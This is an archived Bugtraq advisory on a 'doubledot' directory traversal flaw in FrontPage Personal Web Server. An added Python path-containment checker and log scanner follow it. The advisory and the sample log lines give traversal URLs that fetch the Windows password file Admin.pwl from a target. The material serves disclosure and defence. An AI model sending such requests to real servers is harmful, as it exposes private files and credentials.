[13883] in bugtraq
Doubledot bug in FrontPage Personal Web Server.
daemon@ATHENA.MIT.EDU (Jan van de Rijt)
Thu Feb 17 06:30:48 2000
Message-Id: <000801bf780a$9ad4b2e0$0100007f@localhost>
Date: Wed, 16 Feb 2000 00:15:51 +0100
Reply-To: Jan van de Rijt <rijt@wish.net>
From: Jan van de Rijt <rijt@WISH.NET>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
Description: Doubledot bug in FrontPage Personal Web Server.
Compromise: Accessing the drive through the browser.
Vulnerable Systems: Frontpage-PWS32/3.0.2.926; other versions not tested.
Details:
When FrontPage-PWS runs a site on your c:\ drive, your drive can be accessed by any user accessing your page, simply by requesting any file in any directory except the files in the FrontPage directory, especially /_vti_pvt/.
How to exploit this bug?
Simply add /..../ in the URL address bar.
http://www.target.com/..../<any_dir>/<any_file>
So by requesting http://www.target.com/..../Windows/Admin.pwl the web server lets us download the .pwl file from the target.
Files and directories with the hidden attribute set are vulnerable.
Solution:
The best solution is installing FrontPage on a drive that doesn't contain private information.
Greetings,
Jan van de Rijt aka The Warlock.
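The failing check in the advisory is path containment: the server mapped "/..../<dir>/<file>" to a location outside the site root. Below is an added example (not part of the original post, and not FrontPage code) of the check a server or reverse proxy should apply, plus a scan over constructed log lines for the same pattern. The document root, log format and sample requests are assumptions for illustration.

```python
import posixpath
import re
from urllib.parse import unquote


def resolve_under_root(root, url_path):
    """Map a request path to a file under root, or return None if it escapes.

    Decodes percent-encoding, treats backslashes as separators (Windows
    servers accept both), refuses drive-letter/UNC prefixes and any segment
    made only of dots (".." as well as the "...." form from the advisory),
    then confirms the normalised path still lies below root.
    """
    path = unquote(url_path).replace("\\", "/")
    if "\x00" in path or re.match(r"^/?[A-Za-z]:", path) or path.startswith("//"):
        return None
    for segment in path.split("/"):
        if len(segment) >= 2 and set(segment) == {"."}:
            return None  # dot-only segment: traversal attempt
    normalised = posixpath.normpath("/" + path.lstrip("/"))
    full = posixpath.join(root, normalised.lstrip("/"))
    # belt and braces: the joined path must still share root as its prefix
    if posixpath.commonpath([root, full]) != root:
        return None
    return full


def flag_traversal_attempts(log_lines, root="/srv/www"):
    """Return request paths from common-log-format lines that fail the check."""
    req = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
    flagged = []
    for line in log_lines:
        m = req.search(line)
        if m and resolve_under_root(root, m.group(1)) is None:
            flagged.append(m.group(1))
    return flagged


# Constructed sample log lines (hypothetical, not from the advisory)
SAMPLE_LOG = [
    '10.0.0.5 - - [16/Feb/2000:00:15:51 +0100] "GET /index.htm HTTP/1.0" 200 512',
    '10.0.0.5 - - [16/Feb/2000:00:16:02 +0100] "GET /..../Windows/Admin.pwl HTTP/1.0" 200 688',
    '10.0.0.9 - - [16/Feb/2000:00:16:40 +0100] "GET /_vti_pvt/ HTTP/1.0" 403 0',
    '10.0.0.9 - - [16/Feb/2000:00:17:03 +0100] "GET /%2e%2e/%2e%2e/Windows/Admin.pwl HTTP/1.0" 404 0',
]

if __name__ == "__main__":
    for p in flag_traversal_attempts(SAMPLE_LOG):
        print("traversal attempt:", p)
```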